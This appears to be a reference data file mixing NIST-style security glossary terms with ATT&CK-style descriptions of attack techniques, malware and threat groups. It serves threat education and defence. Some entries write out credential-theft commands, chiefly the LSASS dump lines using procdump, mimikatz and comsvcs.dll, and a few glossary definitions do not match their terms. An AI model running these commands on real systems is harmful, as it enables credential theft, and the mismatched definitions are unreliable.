Definition: Refers to data that is stored within the PIV Card or to a computation that is performed by the Integrated Circuit Chip (ICC) of the PIV Card.

Term: authenticate
Definition: The process of establishing confidence of authenticity; in this case, in the validity of a person’s identity and the PIV Card.

Name: Protocol or Service Impersonation
Type: attack-pattern
Description: Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic. 

Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. 

Adversaries may also leverage legitimate protocols to impersonate expected web traffic or trusted services. For example, adversaries may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted data to disguise C2 communications or mimic legitimate services such as Gmail, Google Drive, and Yahoo Messenger.

Name: RotaJakiro
Type: malware
Description: RotaJakiro is a 64-bit Linux backdoor used by APT32. First seen in 2018, it uses a plugin architecture to extend capabilities. RotaJakiro can determine it's permission level and execute according to access type (`root` or `user`).

Name: Forge Web Credentials
Type: attack-pattern
Description: Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.

Adversaries may generate these credential materials in order to gain access to web resources. This differs from Steal Web Session Cookie, Steal Application Access Token, and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

The generation of web credentials often requires secret values, such as passwords, Private Keys, or other cryptographic seed values. Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials (i.e., Temporary Elevated Cloud Access), or the `zmprov gdpak` command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.

Once forged, adversaries may use these web credentials to access resources (ex: Use Alternate Authentication Material), which may bypass multi-factor and other authentication protection mechanisms.

Term: information system security officer
Definition: Individual with assigned responsibility for maintaining the appropriate operational security posture for a system or program.

Name: Windows Credential Manager
Type: attack-pattern
Description: Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).

The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of Credentials from Web Browsers, Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.

Credential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\`. The encryption key can be found in a file named <code>Policy.vpol</code>, typically located in the same folder as the credentials.

Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. <code>vaultcmd.exe</code> is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as <code>CredEnumerateA</code>, may also be absued to list credentials managed by the Credential Manager.

Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running <code>rundll32.exe keymgr.dll KRShowKeyMgr</code> then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.

Password recovery tools may also obtain plain text passwords from the Credential Manager.

Term: Chief Privacy Officer
Definition: A senior official designated by the head of each agency to have agency-wide responsibilities for privacy, including the implementation of privacy protections; compliance with federal laws, regulations, and policies related to privacy; the management of privacy risks at the agency; and a central policy-making role in the agency’s development and evaluation of legislative, regulatory, and other policy proposals.

Term: SPI
Definition: Arbitrarily chosen value that acts as a unique identifier for an IPsec connection.

Name: Windshift
Type: intrusion-set
Description: Windshift is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.

Term: Variable-value configuration
Definition: For a set of t variables, a variable-value configuration is a set of t valid values, one for each of the variables.

Term: Key Device Cybersecurity Requirement
Definition: A device cybersecurity requirement that if lacking from an IoT device (in the case of a device cybersecurity capability) or manufacturer or supporting entity (in the case of a non-technical supporting capability) will result in unacceptable risk to the organization.

Term: APDU
Definition: A part of the application layer in the Open Systems Interconnection Reference model that is used for communication between two separate device's applications. In the context of smart cards, an APDU is the communication unit between a smart card reader and a smart card. The structure of the APDU is defined by [ISO 7816-4].

Term: advanced persistent threat
Definition: An adversary that possesses sophisticated levels of expertise and significant resources that allow it to create opportunities to achieve its objectives by using multiple attack vectors including, for example, cyber, physical, and deception. These objectives typically include establishing and extending footholds within the IT infrastructure of the targeted organizations for purposes of exfiltrating information, undermining or impeding critical aspects of a mission, program, or organization, or positioning itself to carry out these objectives in the future. The advanced persistent threat pursues its objectives repeatedly over an extended period; adapts to defenders’ efforts to resist it; and is determined to maintain the level of interaction needed to execute its objectives.

Name: Network Boundary Bridging
Type: attack-pattern
Description: Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.

When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via Multi-hop Proxy or exfiltration of data via Traffic Duplication. Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with Internal Proxy to achieve the same goals. In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.

Term: Sequence
Definition: An ordered set of quantities.

Term: continuity of operations plan (COOP)
Definition: Management policy and procedures used to guide an enterprise response to a major loss of enterprise capability or damage to its facilities. The DRP is the second plan needed by the enterprise risk managers and is used when the enterprise must recover (at its original facilities) from a loss of capability over a period of hours or days.

Term: ECDSA
Definition: a digital signature algorithm that is an analog of DSA using elliptic curve mathematics and specified in ANSI draft standard X9.62.

Term: Seed
Definition: A string of bits that is used to initialize a DRBG. Also called a Seed.

Name: Network Share Discovery
Type: attack-pattern
Description: Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 

File sharing over a Windows network occurs over the SMB protocol. Net can be used to query a remote system for available shared drives using the <code>net view \\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for smb services.

Term: proxy server
Definition: A server that services the requests of its clients by forwarding those requests to other servers.

Term: COMSEC manager
Definition: Individual who manages the COMSEC resources of an organization. 
Rationale: The more accurate and used term is “COMSEC account manager”.

Name: FinFisher
Type: malware
Description: FinFisher is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including Wingbird.

Term: boundary protection
Definition: Monitoring and control of communications at the external boundary of an information system to prevent and detect malicious and other unauthorized communications, through the use of boundary protection devices (e.g., gateways, routers, firewalls, guards, encrypted tunnels).

Name: cmd
Type: tool
Description: cmd is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. 

Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., <code>dir</code> ), deleting files (e.g., <code>del</code> ), and copying files (e.g., <code>copy</code> ).

Name: BOLDMOVE
Type: malware
Description: BOLDMOVE is a type of backdoor malware written in C linked to People’s Republic of China operations from 2022 through 2023. BOLDMOVE includes both Windows and Linux variants, with some Linux variants specifically designed for FortiGate Firewall devices. BOLDMOVE is linked to zero-day exploitation of CVE-2022-42475 in FortiOSS SSL-VPNs. The record for BOLDMOVE only covers known Linux variants.

Name: Lumma Stealer
Type: malware
Description: Lumma Stealer is an information stealer malware family in use since at least 2022. Lumma Stealer is a Malware as a Service (MaaS) where captured data has been sold in criminal markets to Initial Access Brokers.

Term: Review Status
Definition: The status of the checklist within the internal NCP review process. Possible status options are: Candidate, Final, Archived, or Under Review. A status of "Final" signifies that NCP has reviewed the checklist and has accepted it for publication within the program.

Term: <em>Type I error</em>
Definition: Incorrectly rejection of a true null hypothesis.

Term: Assurance of public key validity
Definition: Confidence that the public key is arithmetically correct.

Term: Dictionary Management Documents
Definition: A set of documentation that captures the rules and processes specific to a CPE dictionary.

Term: IO
Definition: A general term for the equipment that is used to communicate with a computer as well as the data involved in the communications.

Term: privacy information
Definition: Information that describes the privacy posture of an information system or organization.

Name: Kerberoasting
Type: attack-pattern
Description: Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to Brute Force. 

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service).

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials. 

This same behavior could be executed using service tickets captured from network traffic.

Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.

Name: Carbon
Type: malware
Description: Carbon is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. Carbon has been selectively used by Turla to target government and foreign affairs-related organizations in Central Asia.

Name: Port Monitors
Type: attack-pattern
Description: Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup. This DLL can be located in <code>C:\Windows\System32</code> and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot. 

Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to the `Driver` value of an existing or new arbitrarily named subkey of <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>. The Registry key contains entries for the following:

* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port

Term: destroy
Definition: An action applied to a key or a piece of (secret) data. In this Recommendation, after a key or a piece of data is destroyed, no information about its value can be recovered.

Term: key transport
Definition: A key-establishment procedure whereby one party (the sender) selects and encrypts (or wraps) the keying material and then distributes the material to another party (the receiver). 
When used in conjunction with a public-key (asymmetric) algorithm, the keying material is encrypted using the public key of the receiver and subsequently decrypted using the private key of the receiver. 
When used in conjunction with a symmetric algorithm, the keying material is encrypted with a key-wrapping key shared by the two parties.

Term: digital transaction
Definition: A recording of an event, such as the transfer of assets (digital currency, units of inventory, etc.) between parties, or the creation of new assets.

Term: Entropy
Definition: A measure of the randomness or uncertainty of a random variable.

Term: Integrity protection
Definition: The protection obtained for transmitted or stored data using an authentication code (e.g., MAC) or digital signature computed on that data. See Integrity authentication.

Term: risk analysis
Definition: The process of identifying the risks to system security and determining the likelihood of occurrence, the resulting impact, and the additional safeguards that mitigate this impact. Part of risk management and synonymous with risk assessment.

Name: IIS Components
Type: attack-pattern
Description: Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.

Adversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.

Adversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports <code>RegisterModule</code>, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.

Name: Tsundere Botnet
Type: malware
Description: Tsundere Botnet is a botnet first reported in mid-2025 that is delivered via MSI installer or a PowerShell script. It leverages Node.js and JavaScript for payload delivery and execution, and uses smart contracts on the blockchain to host command and control (C2) addresses. Tsundere Botnet is attributed to a likely Russian-speaking threat actor.

A variant named DinDoor has been linked to MuddyWater operations and uses the Deno runtime for execution rather than Node.js.

Term: error
Definition: The difference between desired and actual performance or behavior of a system or system element.

Term: <em>n</em>
Definition: The number of bytes in the output of a hash function.

Term: Application Layer
Definition: Layer of the TCP/IP protocol stack that sends and receives data for particular applications such as DNS, HTTP, and SMTP.

Term: DRBG
Definition: An RBG that includes a DRBG mechanism and (at least initially) has access to a randomness source. The DRBG produces a sequence of bits from a secret initial value called a seed, along with other possible inputs. A DRBG is often called a Pseudorandom Number (or Bit) Generator. Contrast with NRBG.

Term: subscriber account
Definition: An account established by the CSP for each subscriber enrolled in its identity service that contains information about the subscriber and a record of any authenticators registered to the subscriber.

Term: party
Definition: An individual, group or an organization participating in an action.

Term: jitter
Definition: non-uniform delays that can cause packets to arrive and be processed out of sequence

Term: Scalability testing
Definition: Testing the ability of a system to handle an increasing amount of work correctly.

Term: <em>bLen</em>
Definition: The length of the bit string B in bits

Term: X.509 certificate
Definition: Public key certificates that contain three nested elements: 1) the tamper-evident envelope (digitally signed by the source), 2) the basic certificate content (e.g., identifying information and public key), and 3) extensions that contain optional certificate information.

Term: insider
Definition: Any person with authorized access to any United States Government resource to include personnel, facilities, information, equipment, networks, or systems.

Term: Permissioned
Definition: A system where every node, and every user must be granted permissions to utilize the system (generally assigned by an administrator or consortium).

Term: identity verification
Definition: The process of testing the media to ensure the information cannot be read.

Term: consent banner
Definition: See security banner (also known as notice and consent banners)

Term: Cybersecurity Incident
Definition: An occurrence that actually or imminently jeopardizes, without lawful authority, the integrity, confidentiality, or availability of information or an information system; or constitutes a violation or imminent threat of violation of law, security policies, security procedures, or acceptable use policies.

Term: hash function
Definition: A function that maps a bit string of arbitrary length to a fixed length bit string and is expected to have the following three properties: 
1) Collision resistance (see Collision resistance), 
2) Preimage resistance (see Preimage resistance) and 
3) Second preimage resistance (see Second preimage resistance). 
Approved cryptographic hash functions are specified in [FIPS 180-3].

Term: incident response plan
Definition: The documentation of a predetermined set of instructions or procedures to detect, respond to, and limit consequences of a malicious cyber attacks against an organization’s information system(s).

Term: Executive Order
Definition: Legally binding orders given by the President, acting as the head of the Executive Branch, to Federal Administrative Agencies. Executive Orders are generally used to direct federal agencies and officials in their execution of congressionally established laws or policies.

Term: NC
Definition: A value used in security protocols that is never repeated with the same key. For example, nonces used as challenges in challenge-response authentication protocols SHALL not be repeated until authentication keys are changed. Otherwise, there is a possibility of a replay attack. Using a nonce as a challenge is a different requirement than a random challenge, because a nonce is not necessarily unpredictable.

Term: product
Definition: Result of a process.
Note: A system as a “product” is what is delivered by systems engineering.

Term: Support
Definition: To be capable of providing a service or perform a function that is required or desired; to agree with a policy or position; to fulfill requirements.

Name: Scheduled Transfer
Type: attack-pattern
Description: Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.

When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel or Exfiltration Over Alternative Protocol.

Term: black box testing
Definition: A method of software testing that examines the functionality of an application without peering into its internal structures or workings. This method of test can be applied to virtually every level of software testing: unit, integration, system and acceptance.

Term: Informative References
Definition: A relationship between a Focal Document Element and a Reference Document Element.

Name: DRATzarus
Type: malware
Description: DRATzarus is a remote access tool (RAT) that has been used by Lazarus Group to target the defense and aerospace organizations globally since at least summer 2020. DRATzarus shares similarities with Bankshot, which was used by Lazarus Group in 2017 to target the Turkish financial sector.

Term: <em>⎾x⏋</em>
Definition: For a real number x, ⌈x⌉ is the least integer that is not strictly less than x. For example, ⌈3.2⌉ = 4, ⌈−3.2⌉ = −3, and ⌈6⌉=6.

Term: Public Information
Definition: The term 'public information' means any information, regardless of form or format, that an agency discloses, disseminates, or makes available to the public.

Name: Skeleton Key
Type: malware
Description: Skeleton Key is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. Functionality similar to Skeleton Key is included as a module in Mimikatz.

Term: comprehensive testing
Definition: A test methodology that assumes explicit and substantial knowledge of the internal structure and implementation detail of the assessment object. Also known as white box testing.

Term: COMSEC demilitarization
Definition: The process of preparing National Security System equipment for disposal by extracting all CCI, classified, or CRYPTO-marked components for their secure destruction, as well as defacing and disposing of the remaining equipment hulk.

Term: MD
Definition: The result of applying a hash function to a message.

Term: attribute validation
Definition: The process or act of checking and confirming that the evidence and attributes supplied by an applicant are authentic, accurate, and associated with a real-life identity.

Term: key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the correct key can reproduce or reverse the operation, while an entity without knowledge of the key cannot. Examples of cryptographic operations requiring the use of cryptographic keys include: 1. The transformation of plaintext data into ciphertext data, 2. The transformation of ciphertext data into plaintext data, 3. The computation of a digital signature from data, 4. The verification of a digital signature, 5. The computation of an authentication code from data, 6. The verification of an authentication code from data and a received authentication code, 7. The computation of a shared secret that is used to derive keying material. 8. The derivation of additional keying material from a keyderivation key (i.e., a pre-shared key).

Term: security authorization (to operate)
Definition: The official management decision given by a senior organizational official to authorize operation of an information system and to explicitly accept the risk to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, and the Nation based on the implementation of an agreed-upon set of security controls.

Term: DVD-R
Definition: A write-once (read only) DVD for both movies and data endorsed by the DVD Forum.

Term: Zero Trust Architecture
Definition: A security model, a set of system design principles, and a coordinated cybersecurity and system management strategy based on an acknowledgement that threats exist both inside and outside traditional network boundaries. The zero trust security model eliminates implicit trust in any one element, component, node, or service and instead requires continuous verification of the operational picture via real-time information from multiple sources to determine access and other system responses.

Name: KOPILUWAK
Type: malware
Description: KOPILUWAK is a JavaScript-based reconnaissance tool that has been used for victim profiling and C2 since at least 2017.

Name: GUI Input Capture
Type: attack-pattern
Description: Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: Bypass User Account Control).

Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite. This type of prompt can be used to collect credentials via various languages such as AppleScript and PowerShell. On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. Unix Shell).

Adversaries may also mimic common software authentication requests, such as those from browsers or email clients. This may also be paired with user activity monitoring (i.e., Browser Information Discovery and/or Application Window Discovery) to spoof prompts when users are naturally accessing sensitive sites/data.

Term: digital signature
Definition: A cryptographic technique that utilizes asymmetric-keys to determine authenticity (i.e., users can verify that the message was signed with a private key corresponding to the specified public key), non-repudiation (a user cannot deny having sent a message) and integrity (that the message was not altered during transmission).

Term: Pseudorandom
Definition: A process or data produced by a process is said to be pseudorandom when the outcome is deterministic yet also effectively random as long as the internal action of the process is hidden from observation. For cryptographic purposes, “effectively random” means “computation­ally indistinguishable from random within the limits of the intended security strength.”

Term: point-to-point cross domain solution (CDS)
Definition: A CDS purchased, implemented, and managed within the authorization boundary of the organization's own network. A point-to-point CDS is unable to use an ECDSP.

Name: XCSSET
Type: malware
Description: XCSSET is a modular macOS malware family delivered through infected Xcode projects and executed when the project is compiled. Active since August 2020, it has been observed installing backdoors, spoofed browsers, collecting data, and encrypting user files. It is composed of SHC-compiled shell scripts and run-only AppleScripts, often hiding in apps that mimic system tools (such as Xcode, Mail, or Notes) or use familiar icons (like Launchpad) to avoid detection.

Term: Competency
Definition: defines a competency as the capability of applying or using knowledge, skills, abilities, behaviors, and personal characteristics to successfully perform critical work tasks, specific functions, or operate in a given role or position.

Term: Push-To-Talk (PTT)
Definition: A method of communicating on half-duplex communication lines, including two-way radio, using a “walkie-talkie” button to switch from voice reception to transmit mode.

Term: XPath
Definition: Used to define the parts of an XML document, using path expressions.

Term: SC
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS Publication 199 for other than national security systems. See Security Category.

Term: firmware
Definition: Computer programs and data stored in hardware – typically in read-only memory (ROM) or programmable read-only memory (PROM) – such that the programs and data cannot be dynamically written or modified during execution of the programs. See hardware and software.

Term: Hash_DRBG
Definition: A DRBG specified in SP 800-90A based on a hash function.

Name: LSASS Memory
Type: attack-pattern
Description: Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement using Use Alternate Authentication Material.

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

* <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as `comsvcs.dll` can also be used:

* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code>

Similar to Image File Execution Options Injection, the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).

Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.

The following SSPs can be used to access credentials:

* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.

Term: Address Resolution Protocol (ARP)
Definition: A protocol used to obtain a node’s physical address. A client station broadcasts an ARP request onto the network with the Internet Protocol (IP) address of the target node it wishes to communicate with, and the node with that address responds by sending back its physical address so that packets can be transmitted to it.

Term: <em>Raw data</em>
Definition: Digitized output of the noise source.

Term: <strong>Should</strong>
Definition: Is recommended to.

Term: NC
Definition: A time-varying value that has at most a negligible chance of repeating, for example, a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Term: concept system
Definition: A “set of concepts structured in one or more related domains according to the concept relations among its concepts.”

Name: PyDCrypt
Type: malware
Description: PyDCrypt is malware written in Python designed to deliver DCSrv. It has been used by Moses Staff since at least September 2021, with each sample tailored for its intended victim organization.

Term: LACNIC
Definition: The Internet Address Registry for Latin America and the Caribbean, responsible for assigning and managing Internet number resources for their region.

Name: Bundlore
Type: malware
Description: Bundlore is adware written for macOS that has been in use since at least 2015. Though categorized as adware, Bundlore has many features associated with more traditional backdoors.

Term: ideal randomness source
Definition: The source of an ideal random sequence of bits. Each bit of an ideal random sequence is unpredictable and unbiased, with a value that is independent of the values of the other bits in the sequence. Prior to an observation of the sequence, the value of each bit is equally likely to be 0 or 1, and the probability that a particular bit will have a particular value is unaffected by knowledge of the values of any or all of the other bits. An ideal random sequence of&nbsp;<span class="math-tex">\(n\)</span>&nbsp;bits contains&nbsp;<span class="math-tex">\(n\)</span>&nbsp;bits of entropy.

Term: CDH
Definition: The cofactor ECC Diffie-Hellman key-agreement primitive.

Term: privileged access account holder
Definition: A user who is authorized (and therefore trusted) to perform security-relevant functions that ordinary users are not authorized to perform (e.g., special access to software applications or web publishing), requires additional training, and must sign an acceptable use policy. A user with a privileged access account.

Term: CD-Rewritable
Definition: ACompact Disc Read/Write(CD-RW) isaCD that can be Purged and rewritten multiple times.

Name: Gatekeeper Bypass
Type: attack-pattern
Description: Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.

Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:

1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.

2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.

3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.

4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.

Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. Exploitation for Stealth), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.

Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using Drive-by Compromise.

Term: federal agency
Definition: An executive department specified in 5 U.S.C., Sec. 101; a military department specified in 5 U.S.C., Sec. 102; an independent establishment as defined in 5 U.S.C., Sec. 104(1); and a wholly owned Government corporation fully subject to the provisions of 31 U.S.C., Chapter 91.

Term: service level agreement (SLA)
Definition: A service contract between an FCKMS service provider and an FCKMS service-using organization that defines the level of service to be provided, such as the time to recover from an operational failure or a system compromise.

Term: trust
Definition: See Capability, Trust Management.

Name: Gamaredon Group
Type: intrusion-set
Description: Gamaredon Group is a suspected Russian cyber espionage group that has targeted military, law enforcement, judiciary, non-profit, and non-governmental organizations in Ukraine since at least 2013. The name Gamaredon Group derives from a misspelling of the word "Armageddon," found in early campaigns.

In November 2021, the Ukrainian government publicly attributed Gamaredon Group to Russia’s Federal Security Service (FSB) Center 18, an assessment later supported by multiple independent cybersecurity researchers.

Term: Identity-based authentication
Definition: A process that provides assurance of an entity’s identity by means of an authentication mechanism that verifies the identity of the entity. Contrast with role-based authentication

Name: SyncAppvPublishingServer
Type: attack-pattern
Description: Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious PowerShell commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V). For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.
 
The SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\System32` through the command line via `wscript.exe`.

Adversaries may abuse SyncAppvPublishingServer.vbs to bypass PowerShell execution restrictions and evade defensive counter measures by "living off the land." Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.

For example, PowerShell commands may be invoked using:

`SyncAppvPublishingServer.vbs "n; {PowerShell}"`

Term: IV
Definition: A binary vector used as the input to initialize the algorithm for the encryption of a plaintext block sequence to increase security by introducing additional cryptographic variance and to synchronize cryptographic equipment. The initialization vector need not be secret. Some of the Triple Data Encryption Algorithm Modes of Operation require 3 initialization vectors.

Term: Concatenation
Definition: As used in this Recommendation, the concatenation <i>X</i> || <i>Y</i> of bit string <i>X</i> followed by bit string <i>Y</i> is the ordered sequence of bits formed by appending <i>Y</i> to <i>X</i> in such a way that the leftmost (i.e., initial) bit of <i>Y</i> follows the rightmost (i.e., final) bit of <i>X</i>.

Term: Collection
Definition: The first phase of the computer and network forensics process, which involves identifying, labeling, recording, and acquiring data from the possible sources of relevant data, while following guidelines and procedures that preserve the integrity of the data.

Term: SAISO
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers.
Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.

Term: KEK
Definition: The key for the underlying block cipher of KW, KWP, or TKW. May be called a key-wrapping key in other documents.

Term: DH
Definition: A method used to securely exchange or establish secret keys across an insecure network. Ephemeral Diffie-Hellman is used to create temporary or single-use secret keys.

Term: <strong>Should</strong>
Definition: An objective that can be met.  It is used when a specific requirement is not feasible in some situations or with common current technology.  Non- conformance to such requirements requires less justification and should be more readily approved.

Term: on behalf of (an agency)
Definition: A situation that occurs when (i) a non-executive branch entity uses or operates an information system or maintains or collects information for the purpose of processing, storing, or transmitting federal information; and (ii) those activities are not incidental to providing a service or product to the Government.

Term: host-based security
Definition: A set of capabilities that provide a framework to implement a wide-range of security solutions on hosts. This framework includes a trusted agent and a centralized management function that together provide automated protection to detect, respond, and report host-based vulnerabilities and incidents.

Term: general-purpose IdP
Definition: An IdP that is housed and executed separately from a subscriber’s device (e.g., a remote service). Often, a general-purpose IdP will be capable of representing multiple subscribers.

Term: Capability, Security
Definition: A feature or function.

Term: MD
